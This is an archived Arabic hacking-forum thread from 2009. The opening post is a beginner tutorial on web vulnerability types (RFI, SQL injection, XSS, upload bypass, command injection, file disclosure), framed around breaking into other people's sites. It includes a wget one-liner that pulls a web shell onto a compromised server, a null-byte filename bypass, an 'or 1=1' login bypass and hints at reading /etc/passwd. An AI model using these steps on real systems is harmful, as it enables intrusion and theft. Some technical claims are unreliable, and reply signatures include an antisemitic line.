العودة   منتديات القرصان > دورات المنتدى .. Courses > ارشيف الدورات / Archive Courses > دورة اساسيات اختراق المواقع .. > متوسطة

متوسطة لمن تعدى المبتدئين يمكن الدخول هنا

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 05-29-2009, 05:02 PM
الصورة الرمزية Zo-Dns
w0r|D./exit
 
تاريخ التسجيل: Feb 2008
الدولة: r@qi!
المشاركات: 1,368
معدل تقييم المستوى: 10
Zo-Dns is a glorious beacon of lightZo-Dns is a glorious beacon of lightZo-Dns is a glorious beacon of lightZo-Dns is a glorious beacon of lightZo-Dns is a glorious beacon of light
Thumbs up :.:.:.:.: انواع الثغرات .:. شرح وافي عنها وعن بعض الطرق :.:.:.:.:

السلام عليكم ورحمة الله وبركاته
درس عن انواع الثغرات .:. وشرح مبسط عنها لتاخذ نضرة بسيطة عن هذه الثغرات لكي تتكون
براسك بعض المعلومات المهمة عنها .:.
:.: بسم الله الرحمن الرحيم :.:
.:. الثغرات عبارة عن اخطاء يقع فيها مصممين البرامج او السكربتات
يعني مثلا المنتدى هو سكربت .:. او سكربت الصور .:. او سكربت مركز التحميل .:. او سكربت مكتبة البرامج .:. وغيرها الكثير
المهم .:. انواع الثغرات .:. الثغرات كثيرة جدا بعضها معروف والبعض الاخر غير معروف .:. ايضا هناك ثغرات قوية محتكرة للهكر المحترفين .:.
وايضا هناك ثغرات جميلة ومتعبة من ناحية التنفيذ والاستغلال وشرحها سيطول فلم اضع منها اي نوع من هذه الثغرات .:.
سوف نشرح شرح بسيط عن الثغرات المعروفة .:.
بس احب اذكركم .ان الثغرات انواع وتختلف خطورتها .:. باختلاف نوع الثغرة واصدارها.:.
المهم اول شي يجب ان تعرفه الريموت واللوكال
اللوكال.local. تكون اللوكال وانت محلي على السيرفر وتسمى باللوكال .هذا النوع يقصد به محلي يعني انك لازم تكون على الشل مثلا يعني متواجد على السيرفر .:.
الريموت.remot. وهي تسمى بالسيطرة عن بعد وهذا النوع اخطر من اللوكال .ويقصد به التحكم عن بعد وانت على جهازك تشغل الثغرة على الموقع ايا كان نوع او طريقة عمل الثغرة راح تشتغل معك .:.
-----------------------------------------------------------------------------------------
ثغرات الفايل انكلود :::Remote File Inclusion Vulnerability.:.من اشهر الثغرات قوة . لكنها اصبحت قديمة وصعب انك تلاقيها .:. بس لا تفقد الامل يمكن تلاقيها في بعض المواقع .:.
هذا النوع من الثغرات .يقصد بها ان مصمم السكربت قد وقع في خطا برمجي وهذا الخطا يسمح لنا (((( بربط ملف خارجي بالموقع )))
ما هو الملف الخارجي؟؟ (((( الشل او اي اداه اختراق ))))).
اما عن كيفية اكتشافها فهي صعبة .:. لكككن من لديه خبرة في لغة php او اللغات البرمجة الاخرى
فيمكنه اكتشافها بتنزيل السكربت عندة والبحث عنها في السكربت يدويا او عن طريق بعض البرامج التي اثبتث جدارتها في البحث عن ثغرات الفايل انكلود.:.:.:.
هذه الثغرة مشرروحة بكثرة في منتدانا .:. لانها سهله هعهعهعهع .:. فلن اشرح عنها اكثر
--------------------------------------------------------------------------------------
ثغرات قواعد البيانات :::: SQL Injection ايضا اصبحت هذه الثغرة من الثغرات القوية .:. وهي حسب النتائج اصبحت ثغرة هذا الوقت .:.
وتمكننا هذه الثغرة من معرفة معلومات مهمة ومختلفة .:. حسب العمل الذي تقوم به .:. اقرب مثال لهذه الثغرة .. معرفة اسم الدخول وكلمة المرور لمدير الموقع
وهي مشروحة من الاخ الشبح الدموي عنها في دروس جيدة وهي ممتازة للمبتدئين .:. لكن سوف نشرح عنها بعيدا عن دروس الشبح الدموي لانها ثغرة الوقت مثل ما قلنا في البداية.:.
هذا النوع من الثغرات تعتمد على اخطاء السكربتات التي تتعامل مع قواعد البيانات .:. قواعد البيانات شرحنا عنها في قسم المبتدئين .:.
قاعدة البيانات تحتوي عى معلومات مهمة جدا مثلا تحتوي على على اسماء والباسورد لمستعملي الموقع واهم شي هو باسورد الادمن اي باسورد صاحب الموقع
وعند استطاعتنا الحصول على الباسورد هنا نقف عند نوع التشفير .:. فاذا كان الباسورد مشفر تشفير (md5) وهو اصعب تشفير في مجال المواقع ولا اعتقد ان هناك برامج تفك هذا التشفير
100% 100 .:.:. هناك سكربتات لتشفير الرقم السري الى (md5) بمجرد ما تضع الرقم السري راح يحولة الى 32 .:.
لكن هناك بعض البرامج التي تفك لك التشفير 90%100 لكن بوجود السالت تبع الادمن وهي الكلمة السرية لتذكر الباسورد عند نسيانة .:. عن طريق التخمين
يعمل التخمين بتقنية المقارنة .:. اي تعطيه الباسورد المشفر ويبدا المقارنة فاذا كانت المقارنة هي التساوي .:. اذا قد تم فك التشفير .:.
ولاستكشاف هذه الثغرة يجب ان تنفذ الاستكشاف عن رابط يكون له اتصال بقواعد البيانات

------------------------------------------------------------------------------------
ثغرات XXS :::: Cross-Site ******ing .:. هذه الثغرة نستطيع من خلالها تنفيذ الكثير .:. لكن يجب ان تعرف هذه اللغات
(html) او (جافا سكربت .**********) يعني بامكانك تنفيذها باي مكان فيه ادراج كتابة .مثلا ادراج الكود في الاهداء
عن طريق هذا الكود (مو شرط ايكون هذا)>>>
كود:
<******>*****(’zer0o0-hacker’)</******>
فاذا ضهر مربع تحذير فان الثغرة شغالة ..
.:.: بعض الاستغلات لهذه الثغرة...
سحب كوكيز اعضاء الموقع
تلغيم الموقع
اضافة اي كود جافا سكربت .:. ولغة الجافة بلوى او بالاصح مشكلة .:. يعني اذا لقيت هذه الثغرة في موقع بهذه اللغة ستسقط الموقع .:. وغيرها من الاستغلالات.:.
بلغة (html) او (جافا سكربت .**********) .:.:
ايضا هذه الثغرة مشروحة اعتقد من قرصان العراق في قسم .:. حماية المواقع .:. ولا يحتاج اشرحها كاملا.:.
و هذه الثغرات تنقسم الى ( الدوم والبريسنت والنان بريسنت)...ok
-----------------------------------------------------------------------------------
ثغرات الرفع :::: Remote File Uploed .:. هذه الثغرات تمكننا من رفع ملف على الموقع .:. ثغرات مراكز التحميل .:.
وهذه الثغرات بالنسبة للمبتدئين من اسهل الثغرات يعني بسهولة ثغرة فايل انكلود .:. لكن الاختلاف ان هذه الثغرات بعدها شغالة على بعض مراكز التحميل
يعني تعتمد على نوع السكربت الذي يستخدمه مركز التحميل .:.
بمجرد انك ترفع الشل و تاخذ الرابط وتضعه في المتصفح راح يشتغل .:. وفي بعض المرات تحتاج الى خداع المركز من ناحية الامتداد
بحيث يكون امتداد الشل .:. هكذا .:. r57,php,rar او \c99.php%00.jpg او غير امتداد .:.
او مثلا اذا كان هناك مركز تحميل الاغاني بمجرد انك ما ترفع ملف مثل ملف htaccess. وتضع به اكواد مختلفة لاستقبال الملفات مثل كود يشغل ملفات الام بي اثري كملفات php
وبعد رفعه اتروح ترفع ملف الشل الي هو php بعد تحويل صيغته ال mp3 وترفعه على المركز .:. هعععععععععععع وراخ يشتغل معاك.:.
بعض منها شغالة على مراكز التحميل .:.
وهناك عشرات الطرق لتخطي مراكز التحميل واختراق الموقع نفسه .:. وهذا شرح بسيط عنها .:. ايضا بعض الطرق مشروحة في هذا المنتدى .:.
----------------------------------------------------------------------------------
ثغرات ::::::::::: Command Execution .:. هذه الثغرات تشبه ثغرات الفايل انكلود ولكن الاختلاف انك ما راح تضيف اداه الاختراق باحد
المتغيرات المصابة .:. بل تمكننا هذه الثغرة من كتابة اوامر ((linux)) اي اوامر نضام لينكس اي اوامر الشل ... يعني
تسمح لنا باعطاء اوامر للسيرفر.:.بالاصح التحكم بالسيرفر حسب الصلاحية .:. مثلا امر اضهار ملفات الموقع dir او ls او اضهار صلاحيتك عبر الامر id .. الخ
يعني مثلا نحن في هذا المسار .:.
كود PHP:
www.zer0o0-hack.com/index.php?id=commande 
بدال كوومناد نضع الامر لينكس اذا كان السيرفر لينكس يعني اذا اردنا ان نعرف مكاننا على السيرفر بالامر pwd
الموضوع الأصلى من هنا: منتديات القرصان http://www.alkrsan.net/forum/showthread.php?t=10436
كود PHP:
www.zer0o0-hack.com/index.php?id=pwd 

ثم انشوف الملفات وتصاريحها بالامر ls -la
ومن تلاقي مجلد له تصريح 777 مثلا المجلد data في تصريح 777 .:.التصاريح مشروحة من اخونا القرصان في قسم المبتدئين .:.
تدخل للمجلد بالامر cd وتسحب الشل بالامر wget .:. مثلا هكذا.:.
كود PHP:
cd home/domains/zer0o0-hack.com/public_html/vb/data;wget http://link[****l.zip 

هنا نفذنا امرين امر الدخول للمجلد وامر السحب ووضعنا الامرين معا بالعلامة [;]
حسنا بعد التاكد من سحب الشل انفك ضغط الشل باالامر unzip ****l.zip .:.
الان راح يعمل معاك الشل بمجرد تاخذ مسار الشل الذي وضعته في المجلد وتضعه بعد رابط الموقع .:. وهكذا .:.
وهناك شروحات اخرى عنها .:.
---------------------------------------------------------------------------------
ثغرات :::: File Disclosure .:. وهي الثغرات التي نستطيع من خلالها قرائة ملفات الموقع الهدف وهي كذلك تشابة كثيرا
الثغرة الي فوق .:.
وهذه الثغرة تمكننا في بعض االاحيان السيطرة على السيرفر كاملا .:. اي بالاصح قرائة الملفات المهمة مثل ملفات
(etc/ (passwd,valiases وبالامكان ايضا قرائة ملفات اي موقع بالسيرفر حسب مكانه في السيررفر .:.
---------------------------------------------------------------------------------
ثغرات البوفر اوفر فلو :::: buffer overflow .:..:. هذه الثغرات تحصل بسبب خلل برمجي باالاصح (غفلة من مصمم السكربت)في السكربت او البرنامج
مثلا دخلنا على احد السكربتات وطلب منا ان ندخل الاسم .:. ومبرمج السكربت طلب من البرنامج ان عدد الاحرف لاسم المستخدم لن يتجاوز 20
يعني معقولة في اسم يتجاوز عشرين حرف او مثلا اسم عضو يتجاوز ثلاثين حرف .:. مو معقولة .:.
حسنا .:. متى تحصل الثغرة .:. عندما ندخل مثلا 100 او 150 حرف كاسم للمستخدم .:. البيانات اذي ادخلناها ستكون زائدة جدا فسيحصل طفحان وهو يسمى
""overflow"" في ذاكرة التي خصصت لمتغير الاسم .:.
هذه الثغرات ترشدنا الى معلومات اخرى .:. منها= المعالجة (proccess) فالمعالجة هي المسئولة عن العمليات التي تحصل في الحاسبة
ولكل عملية تحصل في الحاسبة لها عنوان فاضي في الذاكرة .:. ولا يمكن لاي عملية او برنامج اي يدخل الى هذه الذاكرة المخصصة لتلك العملية .:.
ايضا يجب عينا ان نذهب لنقرا القليل عن ادارة الذاكرة (memory management) عندما يكون لدينا عدد كبير من العمليات موجهة الى الذاكرة الحقيقة .:.
وفي نفس الوفت الذاكرة الحقيقة اصغر من كمية المهام الموجهة للذاكرة الحقيقة .:.ستحصل مشكلة ؟؟ اليس كذلك.:.
استغلال هذه الثغرات يكون . عندما ندخل بيانات اكبر حجما من الذاكرة التي خصصت لهذه البيانات .:. فان البيانات الزائدة ستفيض في الذاكرة بعد المتغير ؟؟ من هذا المكان في الذاكرة
سوف نستفاد من هذه الثغرات .:. وهذه الدروس موجودة او ابحث عنها في كوكل .:.وا انتضرونا منانة لسنة اذا كان في مجال بنسوي ادروس هههههههههههههع
ربي يسهلها لكم جميعا ولكل من ناوي يتعلم لافادة الاسلام والمسلمين .:.
ايضا بالامكان عن طريق هذه الثغرات ان ناخذ روت بدون ما نرفع شل اصلا .:.
--------------------------------------------------------------------------
ثغرات :::Remote Dump Database .:او:. Data**** Backup Dump Vulnerability :::
هذه الثغرات تعمل على حسب انواع السكربت واصداراتها .:. مثل ما قلنا لكل اصدار او سكربت ثغرة وطرق عدة لاستغلالها.:.
هذا النوع من الثغرات وهو خاص بسحب باك اب لسكربت معين او نسخ قواعد بيانات كاملة .:.
من خلال ملف سواء ان يكون مجلد الادمن او اي مجلد وضيفته سحب المعلومات من جداول قاعدة البيانات
ومن خلالها سحب الملعومات المهمة الموجودة في users ..الخ..
فكرة الثغرة انها تقوم باخذ باك اب للسكربت الموجود ومن خلالها سوف نقراء المعلومات المهمة .:.
مثلا اذا سحبنا ملف قاعدة البيانات للمنتدى .:. ايش استفدنا .:. اليوزر والباس المشفر هع للادمن .:. ومواقع الفك كثيرة جدا
اغلب الملفات تبع الباك اب يختلف مسارها لكن الاغلب في مجلد :admin:
واسماء الملفات ايضا الاغلب تكون هكذا ::backup.php or upgrade.php :: هي بالاصل تعتمد على مبرمج السكربت وتسميته ملفاته .:.
---------------------------------------------------------------------------------------------
ثغرات :::bypass admin control panal :.او.: Bypass ::::
هذه الثغرات تسمح لنا بتجاوز لوحة التحكم control panal تبع الادمن . اي تخطي صفحة طلب الباسبورد والاسم المرخص لهم بدخول لوحة تحكم .:.
طريقة {{{{{ or 1=1}}}}}}}}}}} حسب الرموز التي تدخلها والرموز كثيرة جدا .:. او عن طريقة الدخول على اي ملف من ملفات المجلد من خلال السكربت
ويمكن نتخطاها بهذه الطريقة .:. هذه الثغرة لها الكثير من الطرق وشرحها سيطول .:. لكن من باب الاستفادة ذكرتها لكم.:.
-------------------------------------------------------------------------------------------
ثغرات ::: Remote Admin Password Change .:. اي تغيير كلمة السر من التحكم البعيد .:.
هذا النوع مشهور واقرب مثال له هي ثغرة سكربت جوملة token joomal هذه الثغرة تسمح لنا بتغيير باسورد
مدير الموقع .:. بدون الحاجة لمعرفة الباسورد القديم . ايضا هناك طريقه جديدة عن هذه الثغرات من اكتشاف احد العباقرة الفلنديين
عجبتني الطريقة عبر مشاهدتها عبر احد الشروحات له وهي بوضع اكواد مختلفة من كافة لغات البرمجة ثم يبدا بتشفيرها .تشفير جديد لم اعرفه..:.ايضا ذكرتها من باب الاستفادة .:.
------------------------------------------------------------------------------------------
----------------------------------------------------------
المهم اخوان هذه الثغرات المعروفة هي جزء من كثير من الثغرات .:. ولكل ثغرة طرق اخرى في الاختراق .:.
وهذه بعض الثغرات الاخرى
1-Data center Attack .:. وهو سحب بيانات الداتا سنتر التي تدعم الموقع .:.
2-DNS Attack .:. هذه الطريقة تعتمد على تحويل DNS الداعم للسيرفر
3-penetration of Domain .:. باين من اسمة (وهو اختراق الدومين للموقع المستهدف (بعدة طرق)).:.
4-Remote Root .:. هذه الطريقة تعتمد على الحصول على الروت من غير شل وهي عن طريق بعض الطرق ومن هذه الطرق
شرحت عنه وهي (buffer over flow) وغيرها .. الخ
5-ddos attack .:. وهي عملية حجب الخدمة ايضا تكون بعدة طرق .:.
6-Server Mail supporter .:. هذه طرق حديثة تعتمد على وضع اكواد لتغيير الايميل الداعم للسيرفر .:.
7-Cpanel Commands .:. هذه الطريقة تعتمد على تنفيذ بعض الاوامر من خلال عمل ادوات تطابق (cpanel) وتنفيذ الاوامر منها .:. واكيد راح تتمكن من رفع الاندكس تبعك
او التعديل في الموقع .:
8- xss .:. نوع جديد وهو قليل من يعرفون عنها .وذو طريقة فعالة .
وهناك الكثير ايضا من الطرق .:. لكن الشي الاخير هو يجب ان تعتمد على ما اعطاك ربك وهو عقلك .:.
------------------------------------------------------------------------
انشوفكم بخير يالطيبين .:. الدروس القادمة اقوى لمرحلة المتوسطين .:. ولاي سوال ضع سوالك في القسم المناسب
وستتم الاجابة عليه باذن الله من قبل الاعضاء القديرين .:.
__________________
سبحان الله وبحمده سبحان ربي العالمين

:أمي الولد الذي تحبينه:
:أصبح الرجل الذي تخشيه:
---------------
Management servers | Protection sites| Programming | white hat | network management
everything about penetration and protection

mohammed the messenger of god is in
our hearts
الحمدلله ولا اله الا الله والله اكبر
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #2  
قديم 05-30-2009, 08:13 AM

قرصان جديد

 
تاريخ التسجيل: May 2009
المشاركات: 24
معدل تقييم المستوى: 0
Mr.pMM511 will become famous soon enough
افتراضي

شرح وااااااااااااافي

جزاك الله الف الف خيرا
__________________
سبحان الله و بحمدة عدد خلقة و رضاء نفسة و مداد كلماتة
اللهم انصر المجاهدين في كل مكان اللهم عليك باليهود
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #3  
قديم 06-08-2009, 05:40 AM

قرصان مشارك

 
تاريخ التسجيل: Sep 2008
العمر: 35
المشاركات: 237
معدل تقييم المستوى: 13
عبادي-99 will become famous soon enough
افتراضي

الله يعطيك العافيه
شرح قمه فى الروعه
سلام
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #4  
قديم 06-08-2009, 09:30 PM
الصورة الرمزية Zo-Dns
w0r|D./exit
 
تاريخ التسجيل: Feb 2008
الدولة: r@qi!
المشاركات: 1,368
معدل تقييم المستوى: 10
Zo-Dns is a glorious beacon of lightZo-Dns is a glorious beacon of lightZo-Dns is a glorious beacon of lightZo-Dns is a glorious beacon of lightZo-Dns is a glorious beacon of light
افتراضي

مشكورين على المرور .:. والتفاعل في هذا القسم
__________________
سبحان الله وبحمده سبحان ربي العالمين

:أمي الولد الذي تحبينه:
:أصبح الرجل الذي تخشيه:
---------------
Management servers | Protection sites| Programming | white hat | network management
everything about penetration and protection

mohammed the messenger of god is in
our hearts
الحمدلله ولا اله الا الله والله اكبر
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #5  
قديم 06-09-2009, 06:17 AM

قرصان جديد

 
تاريخ التسجيل: Jun 2009
العمر: 38
المشاركات: 8
معدل تقييم المستوى: 0
drjamal82 will become famous soon enough
افتراضي

مشكور أخي على المجهود الكبير
__________________
سبحان الله و بحمدة عدد خلقة و رضاء نفسة و مداد كلماتة
اللهم انصر المجاهدين في كل مكان اللهم عليك باليهود
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #6  
قديم 08-15-2009, 03:39 PM

قرصان جديد

 
تاريخ التسجيل: Sep 2008
العمر: 34
المشاركات: 25
معدل تقييم المستوى: 0
محمد الريس will become famous soon enough
افتراضي

ممتاز
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #7  
قديم 09-04-2009, 03:54 AM

قرصان جديد

 
تاريخ التسجيل: Sep 2008
المشاركات: 4
معدل تقييم المستوى: 0
SmOoKy will become famous soon enough
افتراضي

مشكوور اخوي على التوضيحات
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #8  
قديم 09-12-2009, 02:04 PM
الصورة الرمزية emproro
Anonymous
 
تاريخ التسجيل: Mar 2009
الدولة: In Your C:\Windows\System32
المشاركات: 697
معدل تقييم المستوى: 10
emproro will become famous soon enough
افتراضي

مشكووووووووووووووووووووووووووووووووووووووووووووور
__________________
EMPRORO

.:::: [ حصرياً ] كيفية عمل صفحة مزوة ::::.
.:::: شرح تغرة ByPass خطيره والدخو ... ::::.
.:::: شرح تغراة html الخطيرة وتطبيق .... ::::.
.:::: كيفية ايجاد لوحة تحكم الموقع اسهل ... ::::.


رجعت لكم بعد غياب طويل ... كان عندي مشاكل والحمد لله حفت عني قليلاً


Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #9  
قديم 09-15-2009, 07:38 AM

قرصان جديد

 
تاريخ التسجيل: Jun 2008
العمر: 37
المشاركات: 42
معدل تقييم المستوى: 0
قسوة زمن will become famous soon enough
افتراضي

مشكوووووووووووووووورين وما تقصر والله
دروسك قوية ومفيدة لنا احنا المبتدئين
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
  #10  
قديم 09-16-2009, 08:29 AM

قرصان جديد

 
تاريخ التسجيل: Sep 2009
العمر: 26
المشاركات: 6
معدل تقييم المستوى: 0
aszx will become famous soon enough
افتراضي

مشكوووووووووووووووررر
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
موضوع مغلق

العلامات المرجعية


يتصفح الموضوع حالياً : 1 (0 عضو و 1 ضيف)
 
أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة



جميع الأوقات بتوقيت GMT +3. الساعة الآن 06:44 AM.


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.5.1 PL1

تعريب » القرصان - خدمات الويب

جميع الحقوق محفوظة alkrsan 2006-2014


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539